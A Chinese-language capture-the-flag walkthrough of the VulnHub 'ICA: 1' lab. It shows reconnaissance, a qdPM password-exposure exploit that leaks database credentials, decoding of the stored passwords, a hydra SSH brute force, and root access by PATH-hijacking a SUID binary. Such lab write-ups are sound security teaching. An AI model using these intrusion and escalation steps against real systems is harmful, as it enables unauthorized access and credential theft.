ICA
作者:jason_huawen
靶机信息
名称:ICA: 1
地址:
https://www.vulnhub.com/entry/ica-1,748/
识别目标主机IP地址
──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ce:24:39 1 60 PCS Systemtechnik GmbH
192.168.56.150 08:00:27:82:87:1a 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.150
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 21:12 EST
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 39
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, SupportsTransactions, FoundRows, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, Speaks41ProtocolNew, IgnoreSigpipes, SupportsCompression, LongColumnFlag, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: (9MW*8DgK^({)5@\x1A\x0D0=
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/3%Time=63B4E087%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x
SF:08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20mes
SF:sage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAND
SF:esk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0
SF:\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC
SF:,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0
SF:fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\
SF:x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\
SF:x88'\x1a\x0fInvalid\x20message\"\x05HY000");
MAC Address: 08:00:27:82:87:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、3306(MySQL)、33060(MySQLx)
获得Shell
MySQL
先看下数据库是否有弱口令?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ mysql -u root -p -h 192.168.56.150
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.146' (using password: YES)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ mysql -u root -p -h 192.168.56.150
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.146' (using password: NO)
HTTP
利用浏览器访问80端口,返回用户登录界面,可以知道CMS是qdPM 9.2,先看下是否有漏洞?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ searchsploit qdpm
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit) | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2) | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ searchsploit -m php/webapps/50176.txt
Exploit: qdPM 9.2 - Password Exposure (Unauthenticated)
URL: https://www.exploit-db.com/exploits/50176
Path: /usr/share/exploitdb/exploits/php/webapps/50176.txt
File Type: ASCII text
Copied to: /home/kali/Desktop/Vulnhub/ICA/50176.txt
虽然这个漏洞有用户名和密码,但是此处用户名处应该是email,所以失败,但是确实可以获取到databases.yml文件,依据漏洞的操作。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ cat databases.yml
all:
doctrine:
class: sfDoctrineDatabase
param:
dsn: 'mysql:dbname=qdpm;host=localhost'
profiler: false
username: qdpmadmin
password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
attributes:
quote_identifier: true
这应该是数据库的用户名和密码,而数据库MySQL是暴露在外面的,连接一下数据库:
MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.002 sec)
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.001 sec)
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.001 sec)
MySQL [staff]>
──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'c3VSSkFkR3dMcDhkeTNyRg==' | base64 -d
suRJAdGwLp8dy3rF
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'N1p3VjRxdGc0MmNtVVhHWA==' | base64 -d
7ZwV4qtg42cmUXGX
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'WDdNUWtQM1cyOWZld0hkQw==' | base64 -d
X7MQkP3W29fewHdC
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'REpjZVZ5OThXMjhZN3dMZw==' | base64 -d
DJceVy98W28Y7wLg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'Y3FObkJXQ0J5UzJEdUpTeQ==' | base64 -d
cqNnBWCByS2DuJSy
将数据库中编码后的密码进行解码,以及将用户名导出形成用户字典,解码后的密码形成密码字典。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ hydra -L user.dict -P pass.dict ssh://192.168.56.150
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-03 21:54:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.150:22/
[22][ssh] host: 192.168.56.150 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 192.168.56.150 login: dexter password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-03 21:54:23
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ ssh [email protected]
The authenticity of host '192.168.56.150 (192.168.56.150)' can't be established.
ED25519 key fingerprint is SHA256:xCJPzSxRekyYT6eXmyzAXdY7uAlP5b7vQp+B5XqYsfE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.150' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$
──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ ssh [email protected]
[email protected]'s password:
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 08:43:19 2021 from 192.168.1.3
dexter@debian:~$
提权
dexter@debian:~$ find / -type f -perm -u=s 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
dexter@debian:~$ ls -alh /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25 2021 /opt/get_access
dexter@debian:~$ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
发现get_access执行cat命令,因此我们可以生成我们自己cat
dexter@debian:~$ cd /tmp
dexter@debian:/tmp$ echo '/bin/bash' > cat
dexter@debian:/tmp$ chmod 777 cat
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dexter@debian:/tmp$ /opt/get_access
root@debian:/tmp# cd /root
root@debian:/root# ls -alh
total 40K
drwx------ 3 root root 4.0K Sep 25 2021 .
drwxr-xr-x 18 root root 4.0K Sep 25 2021 ..
-rw------- 1 root root 20 Sep 25 2021 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 25 2021 .local
-rw------- 1 root root 647 Sep 25 2021 .mysql_history
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 45 Sep 25 2021 root.txt
-rw-r--r-- 1 root root 260 Sep 25 2021 system.info
-rw-r--r-- 1 root root 217 Sep 25 2021 .wget-hsts
root@debian:/root# cat root.txt
root@debian:/root# more root.txt
ICA{Next_Generation_Self_Renewable_Genetics}
root@debian:/root#
经验教训
-
当进入数据库得到用户名以及密码信息以后,有时不一定能直接登录管理后台,但是这些信息可以作为用户名以及密码字典,然后利用hydra工具进行破解。
-
对于某个自定义可执行命令,用strings查看,如果该命令中引用了非绝对路径的命令,比如本次测试中的cat命令,那么可以利用该命令生成提权的文件,并修改环境参数。